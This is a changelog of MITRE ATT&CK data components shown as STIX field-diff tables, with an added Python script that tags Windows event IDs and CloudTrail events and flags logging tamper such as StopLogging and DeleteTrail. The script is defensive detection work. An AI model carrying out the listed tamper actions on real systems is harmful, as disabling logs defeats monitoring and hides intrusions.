| Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[1] | Windows | Linux |
| x_mitre_platforms[2] | Linux | Windows |
| created | 2021-10-20T15:05:19.275065Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-11-10T09:30:48.698797Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271772Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.699233Z | 2021-11-10T09:30:48.699Z |
| Description |
|---|
| Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Google Workspace |
| x_mitre_platforms[2] | macOS | Linux |
| x_mitre_platforms[3] | SaaS | Office 365 |
| x_mitre_platforms[4] | Office 365 | SaaS |
| x_mitre_platforms[5] | Azure AD | Windows |
| x_mitre_platforms[6] | Google Workspace | macOS |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.271876Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271876Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273872Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273872Z | 2022-05-11T14:00:00.188Z |
| Description |
|---|
| A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.694817Z | 2022-10-20T20:54:47.329Z |
| created | 2021-10-20T15:05:19.274720Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0031 | https://attack.mitre.org/data-sources/DS0031 |
| Description |
|---|
| Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275511Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275511Z | 2022-05-02T23:19:55.148Z |
| Description |
|---|
| A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274206Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274206Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274227Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274227Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Initial construction of a new active directory object (ex: Windows EID 5137) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274137Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274137Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Removal of an active directory object (ex: Windows EID 5141) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274159Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274159Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to an active directory object (ex: Windows EID 5163 or 5136) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274183Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274183Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272957Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272957Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275437Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275437Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274044Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274044Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of cloud services (ex: AWS ECS ListServices) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274066Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274066Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a cloud service and activity around it such as name, type, or purpose/function |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274019Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274019Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274087Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274087Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272529Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272529Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272419Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272419Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272467Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272467Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272508Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272508Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272487Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272487Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272445Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272445Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history) | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.273156Z | 2022-10-07T16:14:39.124Z |
| description | Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history) | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.273156Z | 2021-10-20T15:05:19.273Z |
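The Active Directory data components above cite specific Windows Security event IDs (4769, 4661, 5137, 5141, 5136/5163), the old Command Execution description cites EID 4688, and the cloud service and storage components cite CloudTrail eventName values (StopLogging, DeleteTrail, GetObject, PutObjectAcl and so on). The Python script below is an added example, not part of the ATT&CK STIX data or of this changelog: it tags Windows and CloudTrail records with the data component whose description names that event, and escalates the two components that indicate a defender's logging is being switched off or deleted. The lookup tables are taken from the descriptions on this page; the sample records, the field names used for matching (EventID for Windows, eventName and Records for CloudTrail) and the severity labels are assumptions of the example.

```python
"""Tag raw telemetry with the ATT&CK data component it evidences.

Added example; not part of the ATT&CK STIX data or its changelog. It maps
Windows Security events (by EventID) and AWS CloudTrail records (by
eventName) to the data component whose description cites that event, and
flags the components that indicate logging tamper. Sample records are
constructed for the example and are not real telemetry.
"""
import json
from typing import Dict, List, Optional, Tuple

# Windows Security event IDs cited in the Active Directory and (old)
# Command Execution data component descriptions.
WINDOWS_EID_TO_COMPONENT: Dict[int, str] = {
    4769: "Active Directory Credential Request",
    4661: "Active Directory Object Access",
    5137: "Active Directory Object Creation",
    5141: "Active Directory Object Deletion",
    5136: "Active Directory Object Modification",
    5163: "Active Directory Object Modification",
    4688: "Command Execution",
}

# CloudTrail eventName values cited in the cloud service / cloud storage
# data component descriptions.
CLOUDTRAIL_EVENT_TO_COMPONENT: Dict[str, str] = {
    "StopLogging": "Cloud Service Disable",
    "DeleteTrail": "Cloud Service Modification",
    "DeleteConfigRule": "Cloud Service Modification",
    "ListServices": "Cloud Service Enumeration",
    "GetObject": "Cloud Storage Access",
    "CreateBucket": "Cloud Storage Creation",
    "DeleteBucket": "Cloud Storage Deletion",
    "ListBuckets": "Cloud Storage Enumeration",
    "ListObjects": "Cloud Storage Enumeration",
    "PutObject": "Cloud Storage Modification",
    "PutObjectAcl": "Cloud Storage Modification",
}

# Components that by themselves suggest telemetry is being turned off or
# deleted; escalated regardless of volume (severity labels are assumed).
LOGGING_TAMPER = {"Cloud Service Disable", "Cloud Service Modification"}


def classify_windows_event(event: Dict) -> Optional[str]:
    """Return the data component for one Security-log event, or None."""
    return WINDOWS_EID_TO_COMPONENT.get(event.get("EventID"))


def classify_cloudtrail_record(record: Dict) -> Optional[str]:
    """Return the data component for one CloudTrail record, or None."""
    return CLOUDTRAIL_EVENT_TO_COMPONENT.get(record.get("eventName"))


def triage(windows_events: List[Dict],
           cloudtrail_json: str) -> List[Tuple[str, str, str, str]]:
    """Tag every record; rows are (source, identifier, component, severity).

    Records that map to no component on this page are dropped, so the
    caller sees only telemetry that ATT&CK detections can be written against.
    """
    rows: List[Tuple[str, str, str, str]] = []
    for ev in windows_events:
        comp = classify_windows_event(ev)
        if comp:
            rows.append(("windows", str(ev["EventID"]), comp, "info"))
    for rec in json.loads(cloudtrail_json)["Records"]:
        comp = classify_cloudtrail_record(rec)
        if comp:
            sev = "high" if comp in LOGGING_TAMPER else "info"
            rows.append(("cloudtrail", rec["eventName"], comp, sev))
    return rows


def tamper_alerts(rows: List[Tuple[str, str, str, str]]) -> List[Tuple[str, str, str, str]]:
    """Subset of triage rows that indicate logging tamper."""
    return [r for r in rows if r[3] == "high"]


# Constructed sample input (not real telemetry).
SAMPLE_WINDOWS_EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc-backup", "ServiceName": "MSSQLSvc/db01"},
    {"EventID": 5136, "ObjectDN": "CN=Domain Admins,CN=Users,DC=corp,DC=example"},
    {"EventID": 4624, "TargetUserName": "alice"},  # Logon Session; not mapped here
    {"EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\cmd.exe"},
]

SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventName": "GetObject", "eventSource": "s3.amazonaws.com"},
    {"eventName": "StopLogging", "eventSource": "cloudtrail.amazonaws.com"},
    {"eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com"},
    {"eventName": "PutObjectAcl", "eventSource": "s3.amazonaws.com"},
]})


if __name__ == "__main__":
    for row in triage(SAMPLE_WINDOWS_EVENTS, SAMPLE_CLOUDTRAIL):
        print(row)
```

Running the script prints six tagged rows; the StopLogging record is the only one escalated, which is the behaviour a detection engineer wants from the Cloud Service Disable component: a single occurrence is enough to page on, whereas GetObject and PutObjectAcl are only meaningful in context.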
| Description |
|---|
| Initial construction of a new container (ex: docker create) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274861Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274861Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of containers (ex: docker ps) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274904Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274904Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Activation or invocation of a container (ex: docker start or docker restart) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274928Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274928Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Information about domain name assignments and other domain metadata (ex: WHOIS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275531Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275531Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Opening of a data storage device with an assigned drive letter or mount point |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273087Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273087Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a drive letter or mount point to a data storage device |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273011Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273011Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a drive letter or mount point of a data storage device |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273061Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273061Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274308Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274308Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274285Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274285Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273770Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273770Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new file (ex: Sysmon EID 11) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273724Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273724Z | 2021-10-20T15:05:19.273Z |
| Old Description | New Description |
|---|---|
| Removal of a file (ex: Sysmon EID 23) | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273745Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273745Z | 2022-03-30T14:26:51.805Z |
| description | Removal of a file (ex: Sysmon EID 23) | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) |
| Description |
|---|
| Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273701Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273701Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273791Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273791Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273233Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273233Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273275Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273275Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a firewall and activity around it such as name, policy, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273209Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273209Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273254Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273254Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271356Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271356Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| An extracted list of available groups and/or their associated settings (ex: AWS list-groups) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275365Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275365Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275303Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275303Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275385Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275385Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
